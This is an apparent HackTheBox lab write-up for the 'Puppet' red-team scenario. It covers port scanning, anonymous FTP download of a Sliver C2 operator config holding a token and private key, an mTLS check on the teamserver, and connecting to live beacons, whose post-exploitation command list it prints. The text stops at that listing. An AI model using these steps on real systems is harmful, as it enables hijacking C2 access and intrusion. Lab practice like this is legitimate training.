HackTheBox — Puppet"
Password reuse was the key. One reused password led to mailbox access, then to the app creds hidden in email.
Introduction
You are tasked with performing a red team engagement on Puppet Inc. The company does not allow data leaving the internal network, so a c2 server has been set up internally and an employee executed a payload in order to simulate a successful social engineering attack.
Puppet is a small active directory scenario in which you start with an already running Sliver C2 beacon on an internal system. It is designed to practice operating through a C2 framework in a modern, challenging hybrid environment.
Puppet is designed for penetration testers and red teamers in search of a quick and challenging lab that has c2 infrastructure already set up in order to practice c2 operations.
This Red Team Operator I lab will expose players to:
- Enumeration
- Active Directory enumeration and attacks
- Exploiting DevOps infrastructure
- Lateral movement
- Local privilege escalation
- Situational awareness
- C2 Operations
Short note: Start with the easy leak. Reuse the password, pivot to mail, and the rest of the path becomes obvious.
Recon
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
❯ rustscan -a 10.13.38.33 -- -sC -sV -Pn
[~] The config file is expected to be at "/home/neo/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 924'.
Open 10.13.38.33:21
Open 10.13.38.33:22
Open 10.13.38.33:8140
Open 10.13.38.33:8443
Open 10.13.38.33:31337
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw----r-- 1 0 0 2119 Oct 11 2024 red_127.0.0.1.cfg
|_-rwxr-xr-x 1 0 0 36515304 Oct 12 2024 sliver-client_linux
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.235
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e2:70:df:74:8c:ed:e9:81:46:16:e4:88:bc:7f:69:32 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNFCXV2YO/U9FMHIG2QjuS7+VQAeDDXHBgG3l21HZzMbLpyLa67tP1QuPJn7w76/n+xovFIvo6BTlSds+NZB9II=
| 256 bf:f0:f1:8f:5b:66:93:9b:cb:8b:bc:78:37:b8:b8:3a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBbN+PAvDNKPDEib43tZk/tTe14PcSJN6vgAhui5mGOQ
8140/tcp open ssl/http syn-ack ttl 63 WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07); OpenSSL 3.0.2)
| ssl-cert: Subject: commonName=puppet.puppet.vl
| Subject Alternative Name: DNS:puppet, DNS:puppet.puppet.vl
| Issuer: commonName=Puppet CA: pm01
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-11T18:01:13
| Not valid after: 2029-10-11T18:01:13
| MD5: 88e7 5e1c ac32 c0c3 d7a9 f827 08cb 36c6
| SHA-1: e923 32e2 13a8 05ce 4c93 76b5 16ce 8d3d af51 fbfc
| SHA-256: 1165 85db 9fe4 1903 0421 924b 1903 176d 29a9 e956 0f04 a616 2b44 46a3 3320 929c
| -----BEGIN CERTIFICATE-----
| MIIFkjCCA3qgAwIBAgIBBjANBgkqhkiG9w0BAQsFADAaMRgwFgYDVQQDDA9QdXBw
| ZXQgQ0E6IHBtMDEwHhcNMjQxMDExMTgwMTEzWhcNMjkxMDExMTgwMTEzWjAbMRkw
| FwYDVQQDDBBwdXBwZXQucHVwcGV0LnZsMIICIjANBgkqhkiG9w0BAQEFAAOCAg8A
| MIICCgKCAgEAzB4RyYAe0raw+IJd6788OgFgo65IycNfdVX+MpNiGqxmiCSkkpsN
| fTiERgPKCRV4ilzp4VMkFSmPZMgse+zLzn1m3aLVtCnpJY+H1KcrkjIadh0hRL/V
| TOzFk98lBn/qkFp1Kk11P9KkkcRN73HcKZhnUujj13AOOYKWgQWvAXeNThmVAzps
| 2CdAfBrQM4ZsWEaQ2wQwQr2S0mbBBta1HXDwSiLY+1z0ZzsFlg89YZ5Aw7Crcodx
| 9eGrLSVZ1ac8dACeLqrpHP4CJkgpAuBLtfb77dZBbJNlo6fYccjrsBhlieDenlSR
| PCrsIWdte+OKKeBz25bQvCOx1cqYwMwsYP3EchJln55WpRLp3n9ehPGam/FCFL8/
| uX9z4onf5An7w7TL6XEzlujUPAAPevOVdHPpvLgQNxe/xYp0NlpDaPDAMTHK12+W
| gpMdPA0eM7uM6ospPct4AR9sRa4eF84olspHgIp187ISRysMRIoowqMoKNyIOU+o
| lDs9XdDrNg73/22m51y+vqeVo9iw7X9eUFuSk8y5r0+pzYJ6mzWCw6fHMS/MpoJa
| k2DqbAs772y27p8MVtneigaVGwgFIzWW/PGF/lIbcizTYeue2mQvHuu2XZyGe8qU
| bLTMiP7xGRjf6QMQCIletaAiprOtAatHI4wO3Uc5V1rhlXn84j4ZeuMCAwEAAaOB
| 4TCB3jA3BglghkgBhvhCAQ0EKgwoUHVwcGV0IFJ1YnkvT3BlblNTTCBJbnRlcm5h
| bCBDZXJ0aWZpY2F0ZTAjBgNVHREEHDAaggZwdXBwZXSCEHB1cHBldC5wdXBwZXQu
| dmwwDgYDVR0PAQH/BAQDAgWgMCAGA1UdJQEB/wQWMBQGCCsGAQUFBwMBBggrBgEF
| BQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBSGIzyO8LYD7aNQYjfFX0TqPwvF
| TzAfBgNVHSMEGDAWgBT2G9Xv8mCMXyh7+oPsovbwUQqpfjANBgkqhkiG9w0BAQsF
| AAOCAgEApnZ46CITl7NUrTnMz5gcI/wSQwELKtS/LAOuIzHyQIBLKHnoHi/g59y/
| zuArzeDn+FA5Ug+ZgkyYRdNn99469rV25J1LT3T+psBOXGTtj1zbCw4QEnS9UGRO
| K/vQKWQmeM7X6aaaU7qxixDqOvrff6/Lvy1zqsDCOGhxoHROcMVcCKi8agjYcA93
| p3sEVS6jr68ACurHHs4wL4yH3LKkssc8kB625iCr7FJT2oLKmcAB3X+reAwAa0iP
| qtL1x7CmcU74/uP4stodhZQeKEik+wJ+keLBT3mQEQDe6l9hOSN+JljkjyG/TAJm
| lc/GpChuO3cr01PWhgC0AzbmRQ+wsSf+K/VN3JJfjb2Bdy4PrwL2urOdN0mqIK7F
| d2isbIfb68cIsCaOT4TPdhyea3enSYkLbUtDHQCY0+eMOyP4a9/NrJtZNEWY1T57
| t+jqaoMRQhVgz13pcevU9qJEtCbicW/Q6A+cRbv8pSzNmOicAd2ZZL38S5kcdbbT
| Pe/3nPttv0jE9GFHJPfaOSIPASC7KZZpCZbfYIlhuDnbWi/3xNsWxaV8ZTrjyE+k
| /4kY9FX2t8Rdvos45TxCjbR0C8OYzzT6xJzVylMT+wbwgu0aNph8XH3/Yxe4lc2N
| o5t5+XeaEcPV6yZvdXgT1JPoWdGHTnVVvuep2i9oT9opXDj2knc=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
8443/tcp open ssl/https-alt? syn-ack ttl 63
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=0.0.0.0
| Subject Alternative Name: IP Address:0.0.0.0
| Issuer:
| Public Key type: ec
| Public Key bits: 384
| Signature Algorithm: ecdsa-with-SHA256
| Not valid before: 2024-12-24T14:49:26
| Not valid after: 2027-12-24T14:49:26
| MD5: 39a9 a17b b826 c46d 0a1d 5f5b 5269 eb55
| SHA-1: 002a 9490 ffe2 1941 0cc6 c550 8967 9877 0aae 8ee2
| SHA-256: 9f4a c353 988b 3667 e698 5033 d682 96b2 995f 9870 32e0 27b2 85c3 7c79 6101 4e0a
| -----BEGIN CERTIFICATE-----
| MIIBhjCCAS2gAwIBAgIRALwVJGB/WXATE9ovEkt4NIIwCgYIKoZIzj0EAwIwADAe
| Fw0yNDEyMjQxNDQ5MjZaFw0yNzEyMjQxNDQ5MjZaMBIxEDAOBgNVBAMTBzAuMC4w
| LjAwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAStF2hSR3+1R7iCpHQjVNHtXHdyNiNH
| Ru3eMEWbCN7JeVtwEMxU0rXF6PH/GVWCSJrRQVIz0wdySGwQeREEFulm5hr3omlb
| BRQ8a6cfvl4D7j7LeZeyaF+CSYlpatAWfpqjWTBXMA4GA1UdDwEB/wQEAwIFoDAT
| BgNVHSUEDDAKBggrBgEFBQcDATAfBgNVHSMEGDAWgBSINvl6ZYdjGQlx06151SiE
| IEuu5jAPBgNVHREECDAGhwQAAAAAMAoGCCqGSM49BAMCA0cAMEQCIH8KGc3Zt0kA
| /6nHyF8VktJNUSdOyHGoyC0OGc8M4aQuAiAZy/GhebHYyw0aYVlhEu0+i9Uj2Yjs
| wAS87itgtj43+w==
|_-----END CERTIFICATE-----
31337/tcp open ssl/Elite? syn-ack ttl 63
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=multiplayer
| Subject Alternative Name: DNS:multiplayer
| Issuer: commonName=operators
| Public Key type: ec
| Public Key bits: 384
| Signature Algorithm: ecdsa-with-SHA512
| Not valid before: 2024-05-11T12:31:48
| Not valid after: 2027-05-11T12:31:48
| MD5: d3f7 f0d9 206f 215a 508a 25b1 4088 67d8
| SHA-1: ce52 0a15 d14d f022 22b4 1699 7b84 5688 9c9d 8959
| SHA-256: 2098 36d2 8e8a 2b4d e35b 8d8c ee07 2883 2981 a0ed 3bca 6fd0 2245 c816 8b52 1d4b
| -----BEGIN CERTIFICATE-----
| MIIB6zCCAUygAwIBAgIRAIeEsc7sj+SQgjF0P0MUFWkwCgYIKoZIzj0EAwQwFDES
| MBAGA1UEAxMJb3BlcmF0b3JzMB4XDTI0MDUxMTEyMzE0OFoXDTI3MDUxMTEyMzE0
| OFowFjEUMBIGA1UEAxMLbXVsdGlwbGF5ZXIwdjAQBgcqhkjOPQIBBgUrgQQAIgNi
| AARSxGabC1rhj1H/7dkSTRPPEU6sS++iG3ohim1BzKzKshFyS9VY+ZBlZdkiJN9j
| MVEUy1rwcH2k/YUSQpoeLEp1gv1hEuiEkumUQ6LrqA1uY4rHDN1ttp1JFHviUa4Z
| Df2jYDBeMA4GA1UdDwEB/wQEAwIFoDATBgNVHSUEDDAKBggrBgEFBQcDATAfBgNV
| HSMEGDAWgBR3uMdNk3R5ZjMnw23+9r98cVzXODAWBgNVHREEDzANggttdWx0aXBs
| YXllcjAKBggqhkjOPQQDBAOBjAAwgYgCQgEjtwZ5KM4oNas8ooefiT8pISXwH7lR
| jWDXY5ykiDIkuWYNjti8KFuJYjiLE9eOXncgwDQ3hwmxxSFuFCQiEVApmgJCAKpI
| FtgNVn7N3g5iUDxP6D6IEMboYvoVFuY42lfbt6u1pjqi2l3pHFjI1KfP3Pi5dPF1
| gawb4KsN9mdw5TfvhmuQ
|_-----END CERTIFICATE-----
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:52
Completed NSE at 01:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:52
Completed NSE at 01:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:52
Completed NSE at 01:52, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.42 seconds
Raw packets sent: 5 (220B) | Rcvd: 5 (220B)
…/pro/Neo-Recon ❯
Open 10.13.38.33:21
the scan show ftp open and anonymous login work so i take it as a hint
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
…/prolab/Puppet ❯ ftp 10.13.38.33
Connected to 10.13.38.33.
220 (vsFTPd 3.0.5)
Name (10.13.38.33:neo): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||52007|)
150 Here comes the directory listing.
-rw----r-- 1 0 0 2119 Oct 11 2024 red_127.0.0.1.cfg
-rwxr-xr-x 1 0 0 36515304 Oct 12 2024 sliver-client_linux
226 Directory send OK.
ftp> get red_127.0.0.1.cfg
local: red_127.0.0.1.cfg remote: red_127.0.0.1.cfg
229 Entering Extended Passive Mode (|||49282|)
150 Opening BINARY mode data connection for red_127.0.0.1.cfg (2119 bytes).
100% |********************************************************************| 2119 931.71 KiB/s 00:00 ETA
226 Transfer complete.
2119 bytes received in 00:00 (17.16 KiB/s)
ftp> get sliver-client_linux
local: sliver-client_linux remote: sliver-client_linux
229 Entering Extended Passive Mode (|||57648|)
150 Opening BINARY mode data connection for sliver-client_linux (36515304 bytes).
100% |********************************************************************| 35659 KiB 970.30 KiB/s 00:00 ETA
226 Transfer complete.
36515304 bytes received in 00:36 (967.38 KiB/s)
ftp>
Open 10.13.38.33:22
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
### Open 10.13.38.33:8140
### Open 10.13.38.33:8443
### Open 10.13.38.33:31337
the scan show one open port only and it is **31337** TCP port,
something is actively listening there,
**ssl/** = Nmap detected that the service is speaking **TLS/SSL,**
**Elite?** = Nmap's service fingerprinting thinks it *might* be the old **Elite.**
```jsx
PORT STATE SERVICE REASON
31337/tcp open Elite syn-ack ttl 63
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.87 seconds
Raw packets sent: 5 (196B) | Rcvd: 2 (72B)
-------------------------------------------------------------------------------
NMAP
COMMAND: nmap -Pn -sC -sV -O -T4 -p T:31337 -oN - 10.13.38.33
-------------------------------------------------------------------------------
# Nmap 7.99 scan initiated Tue Sep 29 01:22:33 2026 as: /usr/lib/nmap/nmap -Pn -sC -sV -O -T4 -p T:31337 -oN - 10.13.38.33
Nmap scan report for 10.13.38.33
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
31337/tcp open ssl/Elite?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=multiplayer
| Subject Alternative Name: DNS:multiplayer
| Not valid before: 2024-05-11T12:31:48
|_Not valid after: 2027-05-11T12:31:48
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
this 31337 service is the Sliver C2 teamserver / multiplayer RPC listener.
try to direct connect
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
~ ❯ openssl s_client -connect 10.13.38.33:31337 -servername multiplayer
Connecting to 10.13.38.33
CONNECTED(00000003)
depth=0 CN=multiplayer
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 CN=multiplayer
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0 CN=multiplayer
verify return:1
---
Certificate chain
0 s:CN=multiplayer
i:CN=operators
a:PKEY: EC, (secp384r1); sigalg: ecdsa-with-SHA512
v:NotBefore: May 11 12:31:48 2024 GMT; NotAfter: May 11 12:31:48 2027 GMT
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIB6zCCAUygAwIBAgIRAIeEsc7sj+SQgjF0P0MUFWkwCgYIKoZIzj0EAwQwFDES
MBAGA1UEAxMJb3BlcmF0b3JzMB4XDTI0MDUxMTEyMzE0OFoXDTI3MDUxMTEyMzE0
OFowFjEUMBIGA1UEAxMLbXVsdGlwbGF5ZXIwdjAQBgcqhkjOPQIBBgUrgQQAIgNi
AARSxGabC1rhj1H/7dkSTRPPEU6sS++iG3ohim1BzKzKshFyS9VY+ZBlZdkiJN9j
MVEUy1rwcH2k/YUSQpoeLEp1gv1hEuiEkumUQ6LrqA1uY4rHDN1ttp1JFHviUa4Z
Df2jYDBeMA4GA1UdDwEB/wQEAwIFoDATBgNVHSUEDDAKBggrBgEFBQcDATAfBgNV
HSMEGDAWgBR3uMdNk3R5ZjMnw23+9r98cVzXODAWBgNVHREEDzANggttdWx0aXBs
YXllcjAKBggqhkjOPQQDBAOBjAAwgYgCQgEjtwZ5KM4oNas8ooefiT8pISXwH7lR
jWDXY5ykiDIkuWYNjti8KFuJYjiLE9eOXncgwDQ3hwmxxSFuFCQiEVApmgJCAKpI
FtgNVn7N3g5iUDxP6D6IEMboYvoVFuY42lfbt6u1pjqi2l3pHFjI1KfP3Pi5dPF1
gawb4KsN9mdw5TfvhmuQ
-----END CERTIFICATE-----
subject=CN=multiplayer
issuer=CN=operators
---
Acceptable client certificate CA names
CN=operators
Requested Signature Algorithms: RSA-PSS+SHA256:ECDSA+SHA256:ed25519:RSA-PSS+SHA384:RSA-PSS+SHA512:RSA+SHA256:RSA+SHA384:RSA+SHA512:ECDSA+SHA384:ECDSA+SHA512:RSA+SHA1:ECDSA+SHA1
Shared Requested Signature Algorithms: RSA-PSS+SHA256:ECDSA+SHA256:ed25519:RSA-PSS+SHA384:RSA-PSS+SHA512:RSA+SHA256:RSA+SHA384:RSA+SHA512:ECDSA+SHA384:ECDSA+SHA512
Peer signing digest: SHA384
Peer signature type: ecdsa_secp384r1_sha384
Peer Temp Key: X25519, 253 bits
---
SSL handshake has read 979 bytes and written 1772 bytes
Verification error: unable to verify the first certificate
---
New, TLSv1.3, Cipher is TLS_AES_128_GCM_SHA256
Protocol: TLSv1.3
Server public key is 384 bit
This TLS version forbids renegotiation.
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 21 (unable to verify the first certificate)
---
40276E088E7F0000:error:0A000412:SSL routines:ssl3_read_bytes:ssl/tls alert bad certificate:../ssl/record/rec_layer_s3.c:918:SSL alert number 42
40276E088E7F0000:error:0A000197:SSL routines:SSL_shutdown:shutdown while in init:../ssl/ssl_lib.c:2804:
~ ✗
this tell me it’s “31337 is using mutual TLS ‘0mTLS’ ”
What is happening
The server presents:
subject=CN=multiplayer,issuer=CN=operators
So:
Server certificate: multiplayer,Certificate issuer: operators
Then this line is the key:
Acceptable client certificate CA names, CN=operators
this means server is asking you, the client, to provide a certificate, and it will only accept a client certificate issued by the operators CA.
my connection know is
Client → Server —> TLS handshake —> Server requests client certificate —> Client —> sends no certificate —> Server → “bad certificate”
Authentication happens at the TLS layer first.###
so based on the info it is listening
so we have the file from ftp try to understand how it work and try to connect it is easy too
those to file one is a config CA file and executable
1
2
3
4
5
6
7
…/prolab/Puppet ❯ file sliver-client_linux
sliver-client_linux: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=b4d70dd57296f4d3fd7e692ff5fffdb0cbe017e8, for GNU/Linux 3.2.0, stripped
…/prolab/Puppet ❯ cat red_127.0.0.1.cfg
{"operator":"red","token":"bfbb238704ffecea42314144f4304fb67ffa216006c326fbee7318000e6b5542","lhost":"10.13.38.33","lport":31337,"ca_certificate":"-----BEGIN CERTIFICATE-----\nMIICJjCCAYegAwIBAgIRALAbBjNdSl14hX4alUTLmSMwCgYIKoZIzj0EAwQwFDES\nMBAGA1UEAxMJb3BlcmF0b3JzMB4XDTIzMTIyMjEyMjQ1OVoXDTI2MTIyMTEyMjQ1\nOVowFDESMBAGA1UEAxMJb3BlcmF0b3JzMIGbMBAGByqGSM49AgEGBSuBBAAjA4GG\nAAQAvedDJyjbi1l9OzQvw2IOAx8RVwsjUr+YVDuJ1cG3Hcpt//uSXlCp6/BnsArr\n4V8a59m6MRLg5M6+CEoJWnYTAQ4BmQn6/izlEWpcSUv6VGhNlZRG8P3MpbN2M0cV\nprZ5SFL3SAcXmQWENES/DhkNMT8sf4IwgTM+RA95YXXXwvY9Z/CjdzB1MA4GA1Ud\nDwEB/wQEAwICpDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDwYDVR0T\nAQH/BAUwAwEB/zAdBgNVHQ4EFgQUd7jHTZN0eWYzJ8Nt/va/fHFc1zgwFAYDVR0R\nBA0wC4IJb3BlcmF0b3JzMAoGCCqGSM49BAMEA4GMADCBiAJCARgKKjMFUmd8+tkR\nAJUH30ZpBuSHcDMPYsDaSstgVva1jzn9sI9Dlg5dpRU+8LaK2FXsXUCdlLaYrzIv\np7anvR5CAkIBmk//V/6OV0e1YQcAtg6vL1dBTWPPk6YpLJEicwm6q5DGWMNNHTd8\nhtyfLIKpSsaVXHJjH7kqIbmbuY86TpQo6X0=\n-----END CERTIFICATE-----\n","private_key":"-----BEGIN EC PRIVATE KEY-----\nMIHcAgEBBEIB/vSoY+G1wyjB1xfYo+LpZ9ov7hkQOePJrmq0rznSa/HPRraYjwLZ\nVmfQvD3uXdb3JK1XMKAKVxXnl0zs8QBYAgOgBwYFK4EEACOhgYkDgYYABACp3pUH\nvLKFjb3z/0/IhcHjgfoSKsXCoLuzprckfJfBmI03DP+2uKNqi6V5bpZkzfWWfYDh\nmjXjfY/nPR3lGVL4fwE5ftQMmGffEUaSlZ/MyEQQwZo/oUs6OiTdw0S4aa141bDG\n54CXsdaceGN98H9V1Yrv27S4jFH1D3VEUrCJbkrU5Q==\n-----END EC PRIVATE KEY-----\n","certificate":"-----BEGIN CERTIFICATE-----\nMIIB7zCCAVGgAwIBAgIQL7uHbxTos3ke9pRfj7CXwDAKBggqhkjOPQQDBDAUMRIw\nEAYDVQQDEwlvcGVyYXRvcnMwHhcNMjQwMTMwMTIzMjIyWhcNMjcwMTI5MTIzMjIy\nWjAOMQwwCgYDVQQDEwNyZWQwgZswEAYHKoZIzj0CAQYFK4EEACMDgYYABACp3pUH\nvLKFjb3z/0/IhcHjgfoSKsXCoLuzprckfJfBmI03DP+2uKNqi6V5bpZkzfWWfYDh\nmjXjfY/nPR3lGVL4fwE5ftQMmGffEUaSlZ/MyEQQwZo/oUs6OiTdw0S4aa141bDG\n54CXsdaceGN98H9V1Yrv27S4jFH1D3VEUrCJbkrU5aNIMEYwDgYDVR0PAQH/BAQD\nAgWgMBMGA1UdJQQMMAoGCCsGAQUFBwMCMB8GA1UdIwQYMBaAFHe4x02TdHlmMyfD\nbf72v3xxXNc4MAoGCCqGSM49BAMEA4GLADCBhwJCAQrEErqmcDVO22Ze6caAd5+F\n4nrwq/o1NC1nNODRspipprdjB4/vQMt98PiA2cO9Ayql33rHBNky4IweHdieD4Ws\nAkFQEbWoqRsVhxGAcqmdLI76PyazW1pMi5Rge0UMLQ4mxB4lQ+yKS9qu5pWx3WKz\nsXraOydUfKNpOYdscD/i2TX7fg==\n-----END CERTIFICATE-----\n"}
…/prolab/Puppet ❯
it has a lhost we need to modify and try to add it to the config file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
…/prolab/Puppet ❯ ./sliver-client_linux
? Select a server: red@10.13.38.33 (ba37d8712444d4b2)
Connecting to 10.13.38.33:31337 ...
███████╗██╗ ██╗██╗ ██╗███████╗██████╗
██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗
███████╗██║ ██║██║ ██║█████╗ ██████╔╝
╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗
███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║
╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝
All hackers gain persist
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
sliver > session
error: unknown command, try 'help'
sliver > help
Commands:
=========
clear clear the screen
exit exit the shell
help use 'help [command]' for command help
monitor Monitor threat intel platforms for Sliver implants
wg-config Generate a new WireGuard client config
wg-portfwd List ports forwarded by the WireGuard tun interface
wg-socks List socks servers listening on the WireGuard tun interface
Generic:
========
aliases List current aliases
armory Automatically download and install extensions/aliases
background Background an active session
beacons Manage beacons
builders List external builders
canaries List previously generated canaries
cursed Chrome/electron post-exploitation tool kit (∩`-´)⊃━☆゚.*・。゚
dns Start a DNS listener
env List environment variables
generate Generate an implant binary
hosts Manage the database of hosts
http Start an HTTP listener
https Start an HTTPS listener
implants List implant builds
jobs Job control
licenses Open source licenses
loot Manage the server's loot store
mtls Start an mTLS listener
prelude-operator Manage connection to Prelude's Operator
profiles List existing profiles
reaction Manage automatic reactions to events
regenerate Regenerate an implant
sessions Session management
settings Manage client settings
stage-listener Start a stager listener
tasks Beacon task management
update Check for updates
use Switch the active session or beacon
version Display version information
websites Host static content (used with HTTP C2)
wg Start a WireGuard listener
Multiplayer:
============
operators Manage operators
For even more information, please see our wiki: https://github.com/BishopFox/sliver/wiki
sliver > sessions
[*] No sessions 🙁
sliver > beacons
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== ================ =========== ========== ==================== ================== =============== ===============
515de18c BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 28s 33s
880f2b20 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 28s 51s
ba112874 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 8s 1m20s
efe031c6 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 1m17s 12s
501ffde2 BLUSHING_ERROR mtls File01 PUPPET\bruce.smith windows/amd64 29s 45s
sliver > @@
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
sliver > use 515de18c
[*] Active beacon BLUSHING_ERROR (515de18c-dbae-4b9f-afcf-2d3032905e02)
sliver (BLUSHING_ERROR) > info
Beacon ID: 515de18c-dbae-4b9f-afcf-2d3032905e02
Name: BLUSHING_ERROR
Hostname: File01
UUID: 7bf71442-8e0a-b0b3-3137-869864d441b4
Username: PUPPET\bruce.smith
UID: S-1-5-21-3066630505-2324057459-3046381011-1126
GID: S-1-5-21-3066630505-2324057459-3046381011-513
PID: 4460
OS: windows
Version: Server 2016 build 20348 x86_64
Locale: en-US
Arch: amd64
Active C2: mtls://172.16.40.200:8443
Remote Address: 172.16.40.50:49717
Proxy URL:
Interval: 1m0s
Jitter: 30s
First Contact: Mon Sep 28 22:21:27 EDT 2026 (4h7m30s ago)
Last Checkin: Tue Sep 29 02:28:03 EDT 2026 (54s ago)
Next Checkin: Tue Sep 29 02:29:23 EDT 2026 (in 26s)
sliver (BLUSHING_ERROR) > help
Sliver - Windows:
=================
backdoor Infect a remote file with a sliver shellcode
dllhijack Plant a DLL for a hijack scenario
execute-assembly Loads and executes a .NET assembly in a child process (Windows Only)
getprivs Get current privileges (Windows only)
getsystem Spawns a new sliver session as the NT AUTHORITY\SYSTEM user (Windows Only)
impersonate Impersonate a logged in user.
make-token Create a new Logon Session with the specified credentials
migrate Migrate into a remote process
psexec Start a sliver service on a remote target
registry Windows registry operations
rev2self Revert to self: lose stolen Windows token
runas Run a new process in the context of the designated user (Windows Only)
spawndll Load and execute a Reflective DLL in a remote process
Sliver:
=======
cat Dump file to stdout
cd Change directory
chmod Change permissions on a file or directory
chown Change owner on a file or directory
chtimes Change access and modification times on a file (timestomp)
close Close an interactive session without killing the remote process
download Download a file
execute Execute a program on the remote system
execute-shellcode Executes the given shellcode in the sliver process
extensions Manage extensions
getgid Get session process GID
getpid Get session pid
getuid Get session process UID
ifconfig View network interface configurations
info Get info about session
interactive Task a beacon to open an interactive session (Beacon only)
kill Kill a session
ls List current directory
memfiles List current memfiles
mkdir Make a directory
msf Execute an MSF payload in the current process
msf-inject Inject an MSF payload into a process
mv Move or rename a file
netstat Print network connection information
ping Send round trip message to implant (does not use ICMP)
pivots List pivots for active session
portfwd In-band TCP port forwarding
procdump Dump process memory
ps List remote processes
pwd Print working directory
reconfig Reconfigure the active beacon/session
rename Rename the active beacon/session
rm Remove a file or directory
rportfwd reverse port forwardings
screenshot Take a screenshot
shell Start an interactive shell
shikata-ga-nai Polymorphic binary shellcode encoder (ノ ゜Д゜)ノ ︵ 仕方がない
sideload Load and execute a shared object (shared library/DLL) in a remote process
socks5 In-band SOCKS5 Proxy
ssh Run a SSH command on a remote host
terminate Terminate a process on the remote system
upload Upload a file
